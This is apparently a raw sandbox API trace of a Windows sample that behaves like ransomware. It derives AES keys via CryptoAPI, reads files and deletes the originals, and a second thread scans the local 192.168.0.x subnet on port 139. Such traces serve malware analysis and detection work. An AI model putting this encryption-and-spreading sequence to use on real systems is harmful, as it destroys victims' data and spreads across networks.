ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.124] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0227.124] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.124] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.126] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\shades of blue.htm")) returned 0 [0227.127] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.127] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.127] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.127] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.128] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x127e [0227.128] ReadFile (in: hFile=0x6c4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.133] CryptDestroyHash (hHash=0x284d568) returned 1 [0227.133] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.133] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.135] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\shadesofblue.jpg")) returned 0 [0227.135] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.136] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.136] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.136] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.136] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe8 [0227.136] ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.137] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0227.137] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.137] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.138] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\soft blue.htm")) returned 0 [0227.139] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.139] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.139] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.139] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.139] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2949 [0227.139] ReadFile (in: hFile=0x6c4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.143] CryptDestroyHash (hHash=0x284d568) returned 1 [0227.143] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.143] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.144] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\softblue.jpg")) returned 0 [0227.144] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.145] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.145] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.145] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.145] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe6 [0227.145] ReadFile (in: hFile=0x608, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.147] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0227.147] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.147] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.148] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\stars.htm")) returned 0 [0227.149] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0227.149] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0227.149] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.150] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d628) returned 1 [0227.150] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d51 [0227.150] ReadFile (in: hFile=0x6c4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0227.152] CryptDestroyHash (hHash=0x284d568) returned 1 [0227.152] CryptDestroyKey (hKey=0x284d628) returned 1 [0227.152] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.154] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\stars.jpg")) returned 0 [0227.157] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.157] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.158] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.158] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.158] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.159] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.159] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.160] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.160] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.161] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.161] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.181] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.197] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.198] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.198] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.200] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.215] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.223] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.228] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.230] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.275] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.287] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.298] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.299] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.299] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.300] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.301] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.302] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0227.302] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0227.302] CryptHashData (hHash=0x284d728, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.303] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0227.303] GetFileSize (in: hFile=0x694, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa8e [0227.303] ReadFile (in: hFile=0x694, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0227.319] CryptDestroyHash (hHash=0x284d728) returned 1 [0227.319] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0227.319] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0227.320] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files (x86)\\common files\\services\\verisign.bmp")) returned 1 [0227.320] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.321] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.321] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.321] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.353] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.410] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.513] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.607] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.607] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.657] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.692] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.711] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.712] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.714] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.714] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.714] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.714] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.748] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0227.748] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0227.748] CryptHashData (hHash=0x284d728, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.748] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0227.748] GetFileSize (in: hFile=0x6c4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f44c [0227.748] ReadFile (in: hFile=0x6c4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0227.795] CryptDestroyHash (hHash=0x284d728) returned 1 [0227.795] CryptDestroyKey (hKey=0x284d568) returned 1 [0227.795] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.796] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_100_percent.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_100_percent.pak")) returned 1 [0227.802] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0227.802] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0227.802] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.802] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0227.802] GetFileSize (in: hFile=0x6d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb0b82 [0227.803] ReadFile (in: hFile=0x6d0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0227.860] CryptDestroyHash (hHash=0x284d528) returned 1 [0227.860] CryptDestroyKey (hKey=0x284d568) returned 1 [0227.860] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0227.862] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_200_percent.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_200_percent.pak")) returned 1 [0227.868] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.870] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.870] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0227.870] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0227.871] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0227.871] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0227.871] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0227.871] GetFileSize (in: hFile=0x6d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xad7d02b [0227.871] ReadFile (in: hFile=0x6d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 Thread: id = 121 os_tid = 0x85c [0119.516] GetLastError () returned 0x54f [0119.522] SetLastError (dwErrCode=0x54f) [0119.522] GetCurrentThreadId () returned 0x85c [0119.522] GetCurrentThreadId () returned 0x85c [0119.522] RtlWakeConditionVariable () returned 0x1 [0119.523] GetAdaptersInfo (in: AdapterInfo=0x282fcb0, SizePointer=0x346fd60 | out: AdapterInfo=0x282fcb0, SizePointer=0x346fd60) returned 0x0 [0119.639] GetAdaptersInfo (in: AdapterInfo=0x282fcb0, SizePointer=0x346fd60 | out: AdapterInfo=0x282fcb0, SizePointer=0x346fd60) returned 0x0 [0119.641] inet_pton (in: Family=2, pszAddrString="192.168.0.39", pAddrBuf=0x346fd64 | out: pAddrBuf=0x346fd64) returned 1 [0119.641] inet_pton (in: Family=2, pszAddrString="255.255.255.0", pAddrBuf=0x346fd68 | out: pAddrBuf=0x346fd68) returned 1 [0119.641] htonl (hostlong=0xa8c0) returned 0xc0a80000 [0119.641] htonl (hostlong=0xff00a8c0) returned 0xc0a800ff [0119.641] htonl (hostlong=0xc0a80000) returned 0xa8c0 [0119.641] inet_ntoa (in=0xa8c0) returned="192.168.0.0" [0119.641] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0119.641] socket (af=2, type=1, protocol=6) returned 0x35c [0119.642] inet_addr (cp="192.168.0.0") returned 0xa8c0 [0119.642] htons (hostshort=0x8b) returned 0x8b00 [0119.642] ioctlsocket (in: s=0x35c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0119.642] connect (s=0x35c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.0"), namelen=16) returned -1 [0119.643] ioctlsocket (in: s=0x35c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0119.643] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0120.645] __WSAFDIsSet (param_1=0x35c, param_2=0x346f960) returned 0 [0120.645] GetLastError () returned 0x0 [0120.645] SetLastError (dwErrCode=0x0) [0120.645] GetLastError () returned 0x0 [0120.645] SetLastError (dwErrCode=0x0) [0120.645] GetLastError () returned 0x0 [0120.645] SetLastError (dwErrCode=0x0) [0120.645] htonl (hostlong=0xc0a80001) returned 0x100a8c0 [0120.645] inet_ntoa (in=0x100a8c0) returned="192.168.0.1" [0120.645] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0120.645] socket (af=2, type=1, protocol=6) returned 0x384 [0120.646] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0120.646] htons (hostshort=0x8b) returned 0x8b00 [0120.646] ioctlsocket (in: s=0x384, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0120.646] connect (s=0x384, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.1"), namelen=16) returned -1 [0120.646] ioctlsocket (in: s=0x384, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0120.646] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0121.659] __WSAFDIsSet (param_1=0x384, param_2=0x346f960) returned 0 [0121.659] GetLastError () returned 0x0 [0121.659] SetLastError (dwErrCode=0x0) [0121.659] GetLastError () returned 0x0 [0121.659] SetLastError (dwErrCode=0x0) [0121.659] htonl (hostlong=0xc0a80002) returned 0x200a8c0 [0121.659] inet_ntoa (in=0x200a8c0) returned="192.168.0.2" [0121.659] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0121.659] socket (af=2, type=1, protocol=6) returned 0x340 [0121.660] inet_addr (cp="192.168.0.2") returned 0x200a8c0 [0121.660] htons (hostshort=0x8b) returned 0x8b00 [0121.660] ioctlsocket (in: s=0x340, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0121.660] connect (s=0x340, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.2"), namelen=16) returned -1 [0121.660] ioctlsocket (in: s=0x340, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0121.660] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0122.674] __WSAFDIsSet (param_1=0x340, param_2=0x346f960) returned 0 [0122.674] GetLastError () returned 0x0 [0122.674] SetLastError (dwErrCode=0x0) [0122.674] GetLastError () returned 0x0 [0122.674] SetLastError (dwErrCode=0x0) [0122.674] htonl (hostlong=0xc0a80003) returned 0x300a8c0 [0122.674] inet_ntoa (in=0x300a8c0) returned="192.168.0.3" [0122.674] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0122.674] socket (af=2, type=1, protocol=6) returned 0x388 [0122.674] inet_addr (cp="192.168.0.3") returned 0x300a8c0 [0122.674] htons (hostshort=0x8b) returned 0x8b00 [0122.674] ioctlsocket (in: s=0x388, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0122.674] connect (s=0x388, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.3"), namelen=16) returned -1 [0122.675] ioctlsocket (in: s=0x388, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0122.675] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0123.688] __WSAFDIsSet (param_1=0x388, param_2=0x346f960) returned 0 [0123.688] GetLastError () returned 0x0 [0123.688] SetLastError (dwErrCode=0x0) [0123.688] GetLastError () returned 0x0 [0123.688] SetLastError (dwErrCode=0x0) [0123.688] htonl (hostlong=0xc0a80004) returned 0x400a8c0 [0123.688] inet_ntoa (in=0x400a8c0) returned="192.168.0.4" [0123.688] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0123.688] socket (af=2, type=1, protocol=6) returned 0x39c [0123.688] inet_addr (cp="192.168.0.4") returned 0x400a8c0 [0123.688] htons (hostshort=0x8b) returned 0x8b00 [0123.688] ioctlsocket (in: s=0x39c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0123.688] connect (s=0x39c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.4"), namelen=16) returned -1 [0123.689] ioctlsocket (in: s=0x39c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0123.689] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0124.702] __WSAFDIsSet (param_1=0x39c, param_2=0x346f960) returned 0 [0124.702] GetLastError () returned 0x0 [0124.702] SetLastError (dwErrCode=0x0) [0124.702] GetLastError () returned 0x0 [0124.702] SetLastError (dwErrCode=0x0) [0124.702] htonl (hostlong=0xc0a80005) returned 0x500a8c0 [0124.702] inet_ntoa (in=0x500a8c0) returned="192.168.0.5" [0124.702] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0124.702] socket (af=2, type=1, protocol=6) returned 0x3a4 [0124.702] inet_addr (cp="192.168.0.5") returned 0x500a8c0 [0124.702] htons (hostshort=0x8b) returned 0x8b00 [0124.702] ioctlsocket (in: s=0x3a4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0124.702] connect (s=0x3a4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.5"), namelen=16) returned -1 [0124.703] ioctlsocket (in: s=0x3a4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0124.703] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0125.974] __WSAFDIsSet (param_1=0x3a4, param_2=0x346f960) returned 0 [0125.974] GetLastError () returned 0x0 [0125.974] SetLastError (dwErrCode=0x0) [0125.974] GetLastError () returned 0x0 [0125.974] SetLastError (dwErrCode=0x0) [0125.974] htonl (hostlong=0xc0a80006) returned 0x600a8c0 [0125.974] inet_ntoa (in=0x600a8c0) returned="192.168.0.6" [0125.974] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0125.974] socket (af=2, type=1, protocol=6) returned 0x3ac [0125.974] inet_addr (cp="192.168.0.6") returned 0x600a8c0 [0125.974] htons (hostshort=0x8b) returned 0x8b00 [0125.974] ioctlsocket (in: s=0x3ac, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0125.974] connect (s=0x3ac, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.6"), namelen=16) returned -1 [0125.975] ioctlsocket (in: s=0x3ac, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0125.975] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0127.269] __WSAFDIsSet (param_1=0x3ac, param_2=0x346f960) returned 0 [0127.271] GetLastError () returned 0x0 [0127.272] SetLastError (dwErrCode=0x0) [0127.272] GetLastError () returned 0x0 [0127.272] SetLastError (dwErrCode=0x0) [0127.272] htonl (hostlong=0xc0a80007) returned 0x700a8c0 [0127.272] inet_ntoa (in=0x700a8c0) returned="192.168.0.7" [0127.272] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0127.272] socket (af=2, type=1, protocol=6) returned 0x38c [0127.272] inet_addr (cp="192.168.0.7") returned 0x700a8c0 [0127.272] htons (hostshort=0x8b) returned 0x8b00 [0127.272] ioctlsocket (in: s=0x38c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0127.272] connect (s=0x38c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.7"), namelen=16) returned -1 [0127.272] ioctlsocket (in: s=0x38c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0127.273] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0128.275] __WSAFDIsSet (param_1=0x38c, param_2=0x346f960) returned 0 [0128.275] GetLastError () returned 0x0 [0128.275] SetLastError (dwErrCode=0x0) [0128.275] GetLastError () returned 0x0 [0128.275] SetLastError (dwErrCode=0x0) [0128.275] htonl (hostlong=0xc0a80008) returned 0x800a8c0 [0128.275] inet_ntoa (in=0x800a8c0) returned="192.168.0.8" [0128.275] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0128.275] socket (af=2, type=1, protocol=6) returned 0x3c4 [0128.275] inet_addr (cp="192.168.0.8") returned 0x800a8c0 [0128.275] htons (hostshort=0x8b) returned 0x8b00 [0128.276] ioctlsocket (in: s=0x3c4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0128.276] connect (s=0x3c4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.8"), namelen=16) returned -1 [0128.276] ioctlsocket (in: s=0x3c4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0128.276] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0129.288] __WSAFDIsSet (param_1=0x3c4, param_2=0x346f960) returned 0 [0129.288] GetLastError () returned 0x0 [0129.288] SetLastError (dwErrCode=0x0) [0129.288] GetLastError () 